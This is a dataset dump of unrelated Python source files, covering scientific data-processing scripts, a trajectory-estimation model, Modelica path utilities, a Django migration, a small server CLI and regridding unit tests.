content
stringlengths 0
1.05M
| origin
stringclasses 2
values | type
stringclasses 2
values |
|---|---|---|
import os, sys, inspect
# realpath() will make your script run, even if you symlink it :)
cmd_folder = os.path.realpath(os.path.abspath(os.path.split(inspect.getfile( inspect.currentframe() ))[0]))
if cmd_folder not in sys.path:
sys.path.insert(0, cmd_folder)
# use this if you want to include modules from a subfolder
cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"subfolder")))
if cmd_subfolder not in sys.path:
sys.path.insert(0, cmd_subfolder)
|
nilq/baby-python
|
python
|
from Core.Anlyst import anlyse
from Core.URLs import WayUrl
from Core.URLs import WebUrl
from Test.NetWorkTest import WebUrlPostTest
from Core.NetWork import VisitorWays
from Core.NetWork import visit
xpaths = ['//*[@id="form3"]/a/@href']
selector = '#form3 > a'
def TestOfAnlyseByRegex():
url = "regex://a/b0"
rep = getText().text
anlyse(url,rep)
def TestOfAnlseByWayUrl():
wayurl = WayUrl.WayUrlBuilder().addModel("xPath").build()
anlyse(wayurl)
def getText():
return WebUrlPostTest()
def TestOfXPath():
url = WayUrl.WayUrlBuilder().addModel("xpath").\
addWays(xpaths[0]).build()
rep = getText()
res = anlyse(url,rep.text)
print(res)
def TestOfDOM():
rep = getText().text
# print(url)
url = WayUrl.WayUrlBuilder().\
addModel("DOM").\
addWays(selector).\
build()
print(url)
x = anlyse(url,rep)
for item in x:
print(item.string)
print(x)
def TestOfJson():
weburl = WebUrl.WebUrlBuilder().addHost("https://yz.chsi.com.cn/zsml/pages/getSs.jsp").build()
rep = visit(weburl,VisitorWays.POST,dict(),dict())
rep.encoding = rep.apparent_encoding
wayurl = WayUrl.WayUrlBuilder().addModel("JSON").build()
res = anlyse(wayurl,rep.text)
print(res)
if __name__ == '__main__':
TestOfAnlyseByRegex()
TestOfXPath()
TestOfDOM()
TestOfJson()
pass
|
nilq/baby-python
|
python
|
import click
from cortex.server import server
from cortex.utils import logging
# ----=========== CLI ===========----
@click.group()
def cli():
pass
@cli.command("run-server")
@click.option("--host", "-h")
@click.option("--port", "-p", type=int)
@click.argument('publish_url')
def run_server_cli(host, port, publish_url):
with logging.log_exception(logging.get_module_logger(__file__), to_suppress=(Exception,)):
server.run_server_with_url(host or "127.0.0.1", port or 8080, publish_url)
if __name__ == "__main__":
cli()
|
nilq/baby-python
|
python
|
"""
Account base class for holding Account information
"""
class Account:
def __init__(self):
self.employee_id: int
self.user_name: str
self.password: str
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Book',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=50)),
('category', models.CharField(max_length=16, choices=[(b'CRIME', b'Crime'), (b'HISTORY', b'History'), (b'HORROR', b'Horror'), (b'SCIFI', b'Sci-fi')])),
],
),
]
|
nilq/baby-python
|
python
|
import typing as T
from dataclasses import dataclass
from moonleap import Resource
from titan.project_pkg.service import Tool
@dataclass
class SetupFile(Tool):
pass
@dataclass
class SetupFileConfig(Resource):
body: T.Union[dict, T.Callable]
def get_body(self):
return self.body() if callable(self.body) else self.body
|
nilq/baby-python
|
python
|
import numpy as np
from utils.tt_dataset import AgentType, TrajectoryTypeDataset
from test_problems.u_grid_encoding import xy2mrx_v1 as xy2mrx
from test_problems.risk_distances import dist2rt_v1 as dist2rt
from test_problems.grid_encoding import rt2enc_v1 as rt2enc
from utils import general as ge
import scipy.optimize as opt
def estimate_x_unobs(dataset):
# use \hat{x} as unbiased estimate
for df_info in dataset.df_list:
df = df_info.df
mask = ~df.is_obs & df.type_id == AgentType.ped
df.loc[mask, ['sm_x', 'sm_y']] = df.loc[mask, ['x', 'y']].values
def set_vic_sm_cv(dataset, dt):
"""
Set sm_[x y vx vy] for vic
Velocity via constant velocity (from last)
assume observations are continuous
:param dataset: exist [frame_id(index) agent_id type_id x y
sm_x sm_y sm_vx sm_vy]
:param dt:
:return:
"""
for df_info in dataset.df_list:
df = df_info.df
vic_ids = df.loc[df.type_id == AgentType.vic, 'agent_id'].unique()
for vic_id in vic_ids:
vic_df = df.loc[df.agent_id == vic_id]
v = (vic_df[['x', 'y']].values[1:] -
vic_df[['x', 'y']].values[:-1]) / dt
v = np.vstack((v, v[-1, :]))
df.loc[df.agent_id == vic_id, ['sm_vx', 'sm_vy']] = v
df.loc[df.agent_id == vic_id, ['sm_x', 'sm_y']] =\
vic_df[['x', 'y']].values
class DataframeInds:
"""
For later reassigning vector's values as
df.loc[frame_id in frames &
agent_id == agent_id, 'q'] = q[q_inds]
"""
def __init__(self, n_q_offset=0):
self.frames_list = []
self.agent_ids = []
self.q_inds_list = []
self._n_q = n_q_offset
def append(self, frames, agent_id, q_inds, is_relative=False):
self.frames_list.append(frames)
self.agent_ids.append(agent_id)
add_inds = q_inds
if is_relative:
add_inds = add_inds + self._n_q
self.q_inds_list.append(add_inds)
self._n_q += len(q_inds)
def get_offset(self):
return self._n_q
def __len__(self):
return len(self.frames_list)
def make_unobs_design_matrices(dataset, dt, mrx_grid, rt_grid):
"""
for data term:
\lVert [q \kron (1 \\ 1)] \circ v +
[(1-q) \kron (1 \\ 1)] \circ v \circ (Au) -
\hat{v} \rVert_2^2
so A = (...\\ m_{r_t}(x_t) \\ ...) \kron (1 \\ 1)
ie the matrix that picks out which u are 'active' during this 'slowing' timestep
- order by [dataset.df_list, agent_id, frame_id]
- assume ~is_obs => r >= 0
:param dataset: [sm_(x y vx vy] set for all agents, r]
:param mrx_grid:
:param rt_grid:
:return:
"""
cols = ('sm_x', 'sm_y', 'sm_vx', 'sm_vy')
mrx_list = []
z_list = []
v_hat = []
v = []
df_id2inds = {}
n_q_offset = 0
for df_info in dataset.df_list:
df = df_info.df
df_inds = DataframeInds(n_q_offset=n_q_offset)
print('df unobs total 2: ', (~df['is_obs'].values).sum())
ped_ids = np.unique(df.loc[df.type_id == AgentType.ped, 'agent_id'].values)
for ped_id in ped_ids:
# set \hat{v} = x_next - x_prev / dt
ped_df = df.loc[df.agent_id == ped_id].copy()
ped_frames = ped_df.index.unique().values
ped_df['vh_x'] = np.nan
ped_df['vh_y'] = np.nan
ped_df.loc[ped_df.index[:-1], 'vh_x'] =\
(ped_df['x'].values[1:] - ped_df['x'].values[:-1]) / dt
ped_df.loc[ped_df.index[:-1], 'vh_y'] =\
(ped_df['y'].values[1:] - ped_df['y'].values[:-1]) / dt
unobs_ped_df = ped_df.loc[~ped_df.is_obs].iloc[:-1]
frames = unobs_ped_df.index.unique().values
if frames.size == 0:
# print('skipped')
continue
frame_ptns = ge.split_to_consecutive_v0(frames)
# single frames can have seq_r = [-1]
frame_ptns = [frame_ptn for frame_ptn in frame_ptns if len(frame_ptn) > 1]
if len(frame_ptns) == 0:
continue
seq_df_all = df.loc[ped_frames]
seq_df_all = seq_df_all.loc[(seq_df_all.agent_id == ped_id) |
(seq_df_all.type_id == AgentType.vic)]
frames_all = seq_df_all.index.unique().values
ped_pv_all, vic_pv_all = TrajectoryTypeDataset.build_nan_df(
seq_df_all, frames_all[0], frames_all.size, cols=cols)
for frame_ptn in frame_ptns:
# print(frame_ptn)
# seq_df = seq_df_all.loc[frame_ptn]
# print(seq_df.loc[seq_df.agent_id == ped_id, 'is_r_all'].values)
# print(seq_df.loc[seq_df.agent_id == ped_id, 'r'].values)
# print(seq_df.loc[seq_df.agent_id == ped_id, 'is_obs'].values)
# print(seq_df.loc[seq_df.agent_id == ped_id])
frames_all_inds = np.arange(frame_ptn.size) + int(frame_ptn[0] - frames_all[0])
seq_r = seq_df_all.loc[seq_df_all.agent_id == ped_id, 'r']\
.values.astype(np.int)[frames_all_inds]
assert np.all(seq_r >= 0), seq_r
# select via r -> n_frames, 4
vic_pv = vic_pv_all[frames_all_inds, seq_r, :]
ped_pv = ped_pv_all[frames_all_inds, 0, :]
frames_range = np.arange(frame_ptn.size)
mrx_rows = xy2mrx(ped_pv[:, :2], vic_pv, mrx_grid)
rt = dist2rt(ped_pv, vic_pv)
rt = np.log10(rt)
rt[:, :, 0] /= 2
z_rows = rt2enc(rt, rt_grid) # n_ped=n_frames, n_vic=n_frames, n_rt
z_rows = z_rows[frames_range, frames_range, :]
mrx_list.append(mrx_rows)
z_list.append(z_rows)
v_hat.append(unobs_ped_df.loc[frame_ptn, ['vh_x', 'vh_y']].values)
v.append(unobs_ped_df.loc[frame_ptn, ['sm_vx', 'sm_vy']].values)
df_inds.append(frame_ptn, ped_id, frames_range, is_relative=True)
if len(df_inds) > 0:
df_id2inds[df_info.datafile_path] = df_inds
n_q_offset = df_inds.get_offset()
mrx = np.vstack(mrx_list)
z = np.vstack(z_list)
z = np.hstack((1+0*z[:, [0]], z)) # constant
v_hat = np.vstack(v_hat).T.ravel(order='F')
v = np.vstack(v).T.ravel(order='F')
print(mrx.shape)
print(z.shape)
print(v_hat.shape)
return mrx, z, v_hat, v, df_id2inds
def estimate_u_beta_q_em(mrx, Z, v_hat, v, sigma_x, dt, n_iter=10):
q = initialize_q_em_v0(v_hat, v)
beta = ()
u = ()
precision_u = 1/20
precision_beta = 1/10
def f_obj(q_err_, u_, beta_):
mean_err = q_err_ + ((precision_u * u_) ** 2).sum() + \
((precision_beta * beta_) ** 2).sum()
return mean_err / q.size
for _ in range(n_iter):
u = u_given_q(q, mrx, v_hat, v, sigma_x, dt, precision_u)
beta = beta_given_q(q, Z, beta=beta, precision_beta=precision_beta)
q, q_err = q_given_u_beta(u, beta, mrx, v_hat, v, Z, sigma_x, dt)
print('f = {:.4f}'.format(f_obj(q_err, u, beta)))
return u, beta, q
def estimate_u_beta_q_em_v1(mrx, Z, v_hat, v, sigma_x, dt, n_iter=10):
q = initialize_q_em_v0(v_hat, v)
beta = ()
u = ()
precision_u = 1. #/20
precision_beta = 1/10
def f_obj(q_err_, u_, beta_):
n_u = u.size
C = np.eye(n_u - 1) + np.diag(-np.ones(n_u - 2), k=-1)
bc = np.zeros(n_u - 1)
bc[0] = -u_[0]
mean_err = q_err_ + ((precision_beta * beta_) ** 2).sum() + \
(precision_u * np.linalg.norm(C.dot(u_[1:]) - bc))**2
return mean_err / q.size
for _ in range(n_iter):
u = u_given_q_v1(q, mrx, v_hat, v, sigma_x, dt, precision_u)
beta = beta_given_q(q, Z, beta=beta, precision_beta=precision_beta)
q, q_err = q_given_u_beta(u, beta, mrx, v_hat, v, Z, sigma_x, dt)
print('f = {:.4f}'.format(f_obj(q_err, u, beta)))
return u, beta, q
def initialize_q_em_v0(v_hat, v):
v_norm = np.linalg.norm(v.reshape(-1, 2), axis=1)
v_hat_norm = np.linalg.norm(v_hat.reshape(-1, 2), axis=1)
q = (v_hat_norm >= 0.2 * v_norm) * 1.
# q = (np.random.randn(q.size) > 0) * 1. # also works
return q
def u_given_q(q, mrx, v_hat, v, sigma_x, dt, precision_u):
"""
Estimate field parameters u
- st. -1 <= u <= 1
\lVert (v \circ \{([1-q] \circ mrx) \kron (1 \\ 1)\}) u -
\hat{v} \circ ([1-q] \kron (1 \\ 1)) \rVert_2^2 * (dt^2)/2*sigma_x^2
:param q: n, |
:param mrx: n, n_u | design matrix for u grid
:param v_hat: 2n, | differenced velocities (may be slowing)
:param v: 2n, | actual desired velocities (estimated)
:param sigma_x:
:param dt:
:param precision_u:
:return:
u: n_u, |
"""
n_u = mrx.shape[1]
A = (mrx.T * (1-q)).T
A = np.repeat(A, 2, axis=0)
A = (A.T * v).T * dt / sigma_x
b = np.repeat((1-q), 2) * v_hat * dt / sigma_x
# res = np.linalg.lstsq(A, b, rcond=None)[0]
# add shrinkage + in case close ranges of u not seen
As = np.vstack((A, np.eye(n_u) * precision_u))
bs = np.hstack((b, np.zeros(n_u)))
u = np.linalg.lstsq(As, bs, rcond=None)[0]
if 1 < u.max():
print('1 < u_max, ', u.max())
if u.min() < -1:
print('u_min < -1, ', u.min())
np.clip(u, -1, 1, out=u)
return u
def u_given_q_v1(q, mrx, v_hat, v, sigma_x, dt, precision_u):
"""
Estimate field parameters u, setting close one to -1
- st. -1 <= u <= 1
- u_0 = -1
- ||Cu||_2^2 <=> each u_i close to u_{i+1}
ie add term (u has all but u_0)
Cu - b_c = (-u_1 \\ u_1-u_2 \\ ...) - (-u_0 \\ 0 \\ ...)
with u_0 = -1
- and A' = A[:, 1:], b' = b - u_0*A[:, 0]
\lVert (v \circ \{([1-q] \circ mrx) \kron (1 \\ 1)\}) u -
\hat{v} \circ ([1-q] \kron (1 \\ 1)) \rVert_2^2 * (dt^2)/2*sigma_x^2
:param q: n, |
:param mrx: n, n_u | design matrix for u grid
:param v_hat: 2n, | differenced velocities (may be slowing)
:param v: 2n, | actual desired velocities (estimated)
:param sigma_x:
:param dt:
:param precision_u:
:return:
u: n_u, |
"""
n_u = mrx.shape[1]
A = (mrx.T * (1-q)).T
A = np.repeat(A, 2, axis=0)
A = (A.T * v).T * dt / sigma_x
b = np.repeat((1-q), 2) * v_hat * dt / sigma_x
u_0 = -1
C = np.eye(n_u-1) + np.diag(-np.ones(n_u-2), k=-1)
bc = np.zeros(n_u-1)
bc[0] = -u_0
As = np.vstack((A[:, 1:], C * precision_u))
bs = np.hstack((b - u_0 * A[:, 0], bc * precision_u))
u = np.linalg.lstsq(As, bs, rcond=None)[0]
u = np.hstack((u_0, u))
if 1 < u.max():
print('1 < u_max, ', u.max())
if u.min() < -1:
print('u_min < -1, ', u.min())
np.clip(u, -1, 1, out=u)
return u
def beta_given_q(q, Z, beta=(), precision_beta=0.):
# add very small shrinkage
beta = beta if len(beta) > 0 else np.zeros((Z.shape[1],), dtype=np.float)
res = opt.minimize(
lambda x: logistic_obj(x, q, Z).sum() + (x**2).sum() * precision_beta**2,
beta, method='BFGS')
beta = res.x
return beta
def logistic_obj(beta, q, Z):
"""
Calculate f_i for
f(beta) = 1/n sum_{i=1}^n f_i
with
f_i = -[q_i log(h_i) + (1-q_i) log(1-h_i)]
h_i = 1/(1 + exp{-beta'z_i})
:param beta: m,
:param q: n,
:param Z: n, m
:return:
"""
y = -Z.dot(beta)
# log_h = -np.log(1 + np.exp(y))
log_h = -np.logaddexp(0*y, y)
log_1mh = y + log_h
f = -(q * log_h + (1 - q) * log_1mh)
return f
def q_given_u_beta(u, beta, mrx, v_hat, v, Z, sigma_x, dt):
q_ones = np.ones((Z.shape[0],), dtype=np.float)
logistic_0 = logistic_obj(beta, 0*q_ones, Z)
logistic_1 = logistic_obj(beta, q_ones, Z)
A = np.repeat(mrx, 2, axis=0)
scaling = 0.5 * (dt / sigma_x) ** 2
l2_err_0 = ((v*(A.dot(u)) - v_hat).reshape(-1, 2) ** 2).sum(axis=1) * scaling
l2_err_1 = ((v - v_hat).reshape(-1, 2) ** 2).sum(axis=1) * scaling
q = (l2_err_1 + logistic_1 <= l2_err_0 + logistic_0) * 1.
q_err = (l2_err_1 + logistic_1) * q + (l2_err_0 + logistic_0) * (1-q)
return q, q_err.sum()
def set_q_estimates(dataset, df_id2inds, q):
for df_info in dataset.df_list:
df = df_info.df
df['q'] = np.nan
if df_info.datafile_path not in df_id2inds:
continue
df_inds = df_id2inds[df_info.datafile_path]
for i in range(len(df_inds)):
mask = (df.index.isin(df_inds.frames_list[i])) &\
(df.agent_id == df_inds.agent_ids[i])
df.loc[mask, 'q'] = q[df_inds.q_inds_list[i]]
|
nilq/baby-python
|
python
|
"""
****************************************************************************************************
:copyright (c) 2019-2021 URBANopt, Alliance for Sustainable Energy, LLC, and other contributors.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted
provided that the following conditions are met:
Redistributions of source code must retain the above copyright notice, this list of conditions
and the following disclaimer.
Redistributions in binary form must reproduce the above copyright notice, this list of conditions
and the following disclaimer in the documentation and/or other materials provided with the
distribution.
Neither the name of the copyright holder nor the names of its contributors may be used to endorse
or promote products derived from this software without specific prior written permission.
Redistribution of this software, without modification, must refer to the software by the same
designation. Redistribution of a modified version of this software (i) may not refer to the
modified version by the same designation, or by any confusingly similar designation, and
(ii) must refer to the underlying software originally provided by Alliance as “URBANopt”. Except
to comply with the foregoing, the term “URBANopt”, or any confusingly similar designation may
not be used to refer to any modified version of this software or any modified version of the
underlying software originally provided by Alliance without the prior written consent of Alliance.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
****************************************************************************************************
"""
import logging
import os
import shutil
from uuid import uuid4
_log = logging.getLogger(__name__)
def copytree(src, dst, symlinks=False, ignore=None):
"""
Alternate version of copytree that will work if the directory already exists (use instead of shutil)
"""
for item in os.listdir(src):
s = os.path.join(src, item)
d = os.path.join(dst, item)
if os.path.isdir(s):
shutil.copytree(s, d, symlinks, ignore)
else:
shutil.copy2(s, d)
class ModelicaPath(object):
"""
Class for storing Modelica paths. This allows the path to point to
the model directory, resources, and scripts directory.
"""
def __init__(self, name, root_dir, overwrite=False):
"""
Create a new modelica-based path with name of 'name'
:param name: Name to create
"""
self.name = name
self.root_dir = root_dir
self.overwrite = overwrite
# create the directories
if root_dir is not None:
check_path = os.path.join(self.files_dir)
self.clear_or_create_path(check_path)
check_path = os.path.join(self.resources_dir)
self.clear_or_create_path(check_path)
check_path = os.path.join(self.scripts_dir)
self.clear_or_create_path(check_path)
def clear_or_create_path(self, path):
if os.path.exists(path):
if not self.overwrite:
raise Exception("Directory already exists and overwrite is false for %s" % path)
else:
shutil.rmtree(path)
os.makedirs(path, exist_ok=True)
@property
def files_dir(self):
"""
Return the path to the files (models) for the specified ModelicaPath. This path does not include the
trailing slash.
:return: string, path to where files (models) are stored, without trailing slash
"""
if self.root_dir is None:
return self.files_relative_dir
else:
return os.path.join(self.root_dir, self.name)
@property
def resources_relative_dir(self):
"""
Return the relative resource directory instead of the full path. This is useful when replacing
strings within modelica files which are relative to the package.
:return: string, relative resource's data path
"""
return os.path.join("Resources", "Data", self.name)
@property
def scripts_relative_dir(self, platform='Dymola'):
"""Return the scripts directory that is in the resources directory. This only returns the
relative directory and is useful when replacing string values within Modelica files.
:return: string, relative scripts path
"""
return os.path.join("Resources", "Scripts", self.name, platform)
@property
def files_relative_dir(self):
"""Return the path to the files relative to the project name."""
return os.path.join(self.name)
@property
def resources_dir(self):
"""
Return the path to the resources directory for the specified ModelicaPath. This path does not include
the trailing slash.
:return: string, path to where resources are stored, without trailing slash.
"""
if self.root_dir is None:
return self.resources_relative_dir
else:
return os.path.join(self.root_dir, self.resources_relative_dir)
@property
def scripts_dir(self):
"""
Return the path to the scripts directory (in the resources dir) for the specified ModelicaPath.
This path does not include the trailing slash.
:return: string, path to where scripts are stored, without trailing slash.
"""
if self.root_dir is None:
return self.scripts_relative_dir
else:
return os.path.join(self.root_dir, self.scripts_relative_dir)
def simple_uuid():
"""Generates a simple string uuid
:return: string, uuid
"""
return str(uuid4()).split("-")[0]
|
nilq/baby-python
|
python
|
"""
Generate training source and target domain records
"""
import os
import csv
import random
import argparse
def write_csv(path, lines):
with open(path, 'w') as f:
csv_writer = csv.writer(f, delimiter='\t')
for i, (p, l) in enumerate(lines):
csv_writer.writerow([i, l, p])
def read_image_list(image_list):
items = []
with open(image_list, 'r') as f:
for item in f:
p, l = item.split()
items.append((p, l))
return items
def sampling_images(items):
if args.m == 0 and args.n > 0:
# random shuffle
rng = random.Random(args.seed)
rng.shuffle(items)
return items[: min(args.n, len(items))], items[min(args.n, len(items)):]
elif args.m == 1 and args.n > 0:
# balanced sampling
rng = random.Random(args.seed)
cls = {}
for idx, (_, c) in enumerate(items):
if c in cls:
cls[c].append(idx)
else:
cls[c] = [idx]
n_cls = args.n // len(cls)
idx_selected = []
idx_unselected = []
# sampling
for k, v in cls.items():
rng.shuffle(v)
idx_selected.extend(v[: min(n_cls, len(v))])
idx_unselected.extend(v[min(n_cls, len(v)): ])
train_list = [items[i] for i in idx_selected]
test_list = [items[i] for i in idx_unselected]
rng.shuffle(train_list)
rng.shuffle(test_list)
return train_list, test_list
else:
rng = random.Random(args.seed)
rng.shuffle(items)
return items, []
def generate_list():
if not os.path.exists(args.out_dir):
os.makedirs(args.out_dir)
items = read_image_list(args.image_list)
train_items, test_items = sampling_images(items)
if len(train_items) > 0:
write_csv(os.path.join(args.out_dir, '%s-%d.lst' % (args.prefix, args.n)), train_items)
if len(test_items) > 0:
write_csv(os.path.join(args.out_dir, '%s-%d.lst' % (args.prefix, len(test_items))), test_items)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('image_list', help='image list')
parser.add_argument('prefix', help='prefix')
parser.add_argument('--m', type=int, default=1, help='sampling method')
parser.add_argument('--n', type=int, default=1200, help='sampling number')
parser.add_argument('--seed', type=int, default=0, help='seed')
parser.add_argument('--out-dir', type=str, default='datasets/VisDA17')
args = parser.parse_args()
generate_list()
|
nilq/baby-python
|
python
|
# Copyright (c) 2021 Valerii Sukhorukov. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER ''AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# -----------------------------------------------------------------------------
"""Functions extracting empitical length and curvature distributions.
Source publication:
Zhen Zhang Yukako Nishimura, and Pakorn Kanchanawonga 'Extracting
microtubule networks from superresolution single-molecule localization
microscopy data' MBoC, 2017.
"""
from collections import namedtuple
from typing import Sequence
Extent = namedtuple('Range', ['begin', 'end'])
def curvature(density: bool):
"""Curvature data extracted from publication plots.
"""
pix = Extent(begin=[177, 900], end=[1195, 81])
val = Extent(begin=[0, 0], end=[1.5, 1])
# Blue:
contro_pix = [0, 696, 251, 81, 109, 232, 458, 591, 685, 738, 797, 822,
832, 852, 865, 871, 874, 887, 880, 891, 895, 894, 897, 895,
895, 895, 895, 895, 899, 900, 899]
# Red:
ca_ras_pix = [0, 702, 228, 81, 151, 164, 330, 527, 616, 711, 770, 808,
817, 799, 820, 830, 867, 881, 876, 886, 888, 899, 897, 886,
899, 895, 895, 899, 899, 900, 899]
return _process(pix, val, [contro_pix, ca_ras_pix],
start=1, density=density)
def length(density: bool) -> tuple[list, list[list]]:
"""Length data extracted from publication plots.
"""
pix = Extent(begin=[121, 873], end=[1000, 75])
val = Extent(begin=[0, 0], end=[20, 1])
# Green:
contro_pix = [0, 0, 441, 75, 201, 339, 425, 477, 493, 567, 615, 604,
652, 656, 676, 702, 714, 720, 740, 759, 742, 788, 800, 788,
801, 809, 809, 815, 829, 813, 833, 822, 848, 832, 846, 833,
858, 859, 854, 854, 858, 854, 858, 858, 858, 857, 864, 856,
855, 858, 861, 860, 863, 863, 863, 873, 864, 868, 868, 870]
# Red:
ca_ras_pix = [0, 0, 453, 75, 256, 372, 388, 453, 460, 548, 589, 632,
620, 651, 612, 724, 718, 701, 738, 772, 749, 755, 758, 804,
786, 830, 786, 799, 814, 827, 811, 800, 833, 837, 816, 820,
833, 833, 854, 852, 829, 843, 847, 847, 847, 857, 855, 865,
868, 872, 872, 851, 868, 863, 862, 868, 872, 857, 873, 865]
return _process(pix, val, [contro_pix, ca_ras_pix],
start=2, density=density)
def _process(
pix: Extent,
val: Extent,
data: Sequence[Sequence],
start: int = 0,
density: bool = False,
) -> tuple[list, list[list]]:
range_pix = [pix.end[0] - pix.begin[0],
pix.begin[1] - pix.end[1]]
range_val = [val.end[i] - val.begin[i] for i in range(2)]
scale = [range_val[i] / range_pix[i] for i in range(2)]
n = len(data[0])
bin_pix = range_pix[0] / n
bin_val = bin_pix * scale[0]
x = [i * bin_val for i in range(start, n)]
res = [[(pix.begin[1] - v) * scale[1] for v in d[start:]] for d in data]
if density:
s = (sum(r) for r in res)
res = ([r/ss/bin_val for r in rr] for rr, ss in zip(res, s))
return x, res
def avg(
xx: Sequence,
yy: Sequence
) -> float:
"""Averages from frequency distribution.
"""
dx = xx[1] - xx[0]
a = sum(yy) * dx
yy = [y / a for y in yy]
return sum([x * y for x, y in zip(xx, yy)]) * dx
if __name__ == '__main__':
as_density = True
x_curv, (control_curv, ca_ras_curv) = curvature(as_density)
control_curv_avg = avg(x_curv, control_curv)
x_leng, (control_leng, ca_ras_leng) = length(as_density)
control_leng_avg = avg(x_leng, control_leng)
|
nilq/baby-python
|
python
|
import cdat_info
import cdms2
import numpy
import unittest
import sys
PLOT = False
if PLOT:
from matplotlib import pylab as pl
from mpl_toolkits.basemap import Basemap as bm
class TestTasRegrid(unittest.TestCase):
"""
All test interpolate to the same grid
"""
def setUp(self):
self.clt = cdms2.open(cdat_info.get_sampledata_path() + '/clt.nc')('clt')[0, ...]
self.tas = cdms2.open(cdat_info.get_sampledata_path() + \
'/tas_ecm_1979.nc')('tas')[0, ...]
if PLOT:
lllat = self.clt.getLatitude()[:].min()
urlat = self.clt.getLatitude()[:].max()
lllon = self.clt.getLongitude()[:].min()
urlon = self.clt.getLongitude()[:].max()
self.cmap = bm(llcrnrlat = lllat, llcrnrlon = lllon,
urcrnrlat = urlat, urcrnrlon = urlon,
resolution = 'i', projection = 'cyl')
lllat = self.tas.getLatitude()[:].min()
urlat = self.tas.getLatitude()[:].max()
lllon = self.tas.getLongitude()[:].min()
urlon = self.tas.getLongitude()[:].max()
self.tmap = bm(llcrnrlat = lllat, llcrnrlon = lllon,
urcrnrlat = urlat, urcrnrlon = urlon,
resolution = 'i', projection = 'cyl')
def test_test1(self):
"""
2D
"""
tas = cdms2.open(cdat_info.get_sampledata_path() + \
'/tas_ccsr-95a_1979.01-1979.12.nc')('tas')[0, 0,...]
tasInterp = tas.regrid( tas.getGrid() )
print numpy.all(tasInterp.mask)
if not numpy.all(tasInterp.mask):
n = reduce(lambda x,y: x*y, tasInterp.shape)
diff = abs(numpy.sum(tas - tasInterp))/float(n)
self.assertLess(diff, 3.e-5)
def test_test2(self):
"""
2D + time
"""
tas = cdms2.open(cdat_info.get_sampledata_path() + \
'/tas_ccsr-95a_1979.01-1979.12.nc')('tas')[:, 0,...]
tasInterp = tas.regrid( tas.getGrid() )
if not numpy.all(tasInterp.mask):
n = reduce(lambda x,y: x*y, tasInterp.shape)
diff = abs(numpy.sum(tas - tasInterp))/float(n)
self.assertLess(diff, 3.e-5)
def test_test3(self):
"""
2D + level
"""
tas = cdms2.open(cdat_info.get_sampledata_path() + \
'/tas_ccsr-95a_1979.01-1979.12.nc')('tas')[0, :,...]
tasInterp = tas.regrid( tas.getGrid() )
if not numpy.all(tasInterp.mask):
n = reduce(lambda x,y: x*y, tasInterp.shape)
diff = abs(numpy.sum(tas - tasInterp))/float(n)
self.assertLess(diff, 3.e-5)
def test_test4(self):
"""
2D + level + time
"""
tas = cdms2.open(cdat_info.get_sampledata_path() + \
'/tas_ccsr-95a_1979.01-1979.12.nc')('tas')[:, :,...]
tasInterp = tas.regrid( tas.getGrid() )
if not numpy.all(tasInterp.mask):
tasInterp[0,0,...]
n = reduce(lambda x,y: x*y, tasInterp.shape)
diff = abs(numpy.sum(tas - tasInterp))/float(n)
self.assertLess(diff, 3.e-5)
def Xtest_test5(self):
tasInterp = self.tas.regrid(self.clt.getGrid())
cltInterp = self.clt.regrid(self.tas.getGrid())
tasIntCyc = self.tas.regrid(self.clt.getGrid(), mkCyclic = True)
cltIntCyc = self.clt.regrid(self.tas.getGrid(), mkCyclic = True)
if PLOT:
fig = pl.figure(1)
fig.add_subplot(2,2,1)
self.cmap.pcolor(self.tas.getLongitude()[:], self.tas.getLatitude()[:],
cltInterp, vmin = 0, vmax = 100)
self.cmap.colorbar()
self.cmap.drawcoastlines()
